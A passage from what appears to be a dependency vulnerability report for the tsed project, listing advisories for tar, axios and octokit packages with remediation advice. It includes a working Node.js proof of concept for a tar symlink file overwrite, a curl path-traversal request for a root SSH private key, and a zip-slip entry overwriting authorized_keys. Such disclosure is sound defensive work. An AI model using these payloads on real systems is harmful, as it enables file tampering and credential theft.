  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack via tar.x() extraction, which allows an attacker to overwrite arbitrary files outside the intended extraction directory with a drive-relative symlink target - like C:../../../target.txt.

PoC


const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.11 or higher.

References

high severity
new

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the shouldBypassProxy function. An attacker can access internal or metadata endpoints by crafting request URLs in IPv4-mapped IPv6 notation, bypassing proxy exclusions. This can result in exposure of sensitive information, such as credentials, especially in cloud environments where instance metadata services are present.

Note: This is only exploitable if the attacker can control the request URL and the application is configured with NO_PROXY to exclude internal or metadata endpoints while using an HTTP/HTTPS proxy.

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

high severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution through the config.proxy property in the HTTP adapter, which accesses properties via the prototype chain. An attacker can intercept and modify all HTTP requests and responses, including sensitive authentication credentials, by polluting the Object.prototype with a malicious proxy object. This allows the attacker to route all HTTP traffic through a proxy server under their control, enabling full visibility and manipulation of data in transit.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: @octokit/plugin-paginate-rest
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @octokit/rest@19.0.11 @octokit/plugin-paginate-rest@6.1.2
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @octokit/rest@19.0.11 @octokit/plugin-paginate-rest@6.1.2

Overview

@octokit/plugin-paginate-rest is an Octokit plugin to paginate REST API endpoint responses

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the octokit.paginate.iterator process. An attacker can cause significant performance degradation and potential service unresponsiveness by injecting a malicious Link header in the request.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade @octokit/plugin-paginate-rest to version 9.2.2, 11.4.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: @octokit/request
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/request@6.2.8
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/graphql@5.0.6 @octokit/request@6.2.8
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/request@6.2.8
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/graphql@5.0.6 @octokit/request@6.2.8
    Remediation: Upgrade to lerna@8.2.1.

Overview

@octokit/request is a Send parameterized requests to GitHub's APIs with sensible defaults in browsers and Node

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the link header processing. An attacker can cause excessive CPU usage and potentially make the server unresponsive by sending a specially crafted link header designed to trigger inefficient regex backtracking.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade @octokit/request to version 8.4.1, 9.2.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: @octokit/request-error
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/request-error@3.0.3
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/request@6.2.8 @octokit/request-error@3.0.3
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/request-error@3.0.3
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/graphql@5.0.6 @octokit/request@6.2.8 @octokit/request-error@3.0.3
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/request@6.2.8 @octokit/request-error@3.0.3
    Remediation: Upgrade to lerna@8.2.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @octokit/rest@19.0.11 @octokit/core@4.2.4 @octokit/graphql@5.0.6 @octokit/request@6.2.8 @octokit/request-error@3.0.3
    Remediation: Upgrade to lerna@8.2.1.

Overview

@octokit/request-error is an Error class for Octokit request errors

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper handling of the authorization header. An attacker can cause excessive CPU usage and potentially freeze the server by sending a specially crafted authorization header containing a long sequence of spaces followed by a newline and "@".

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

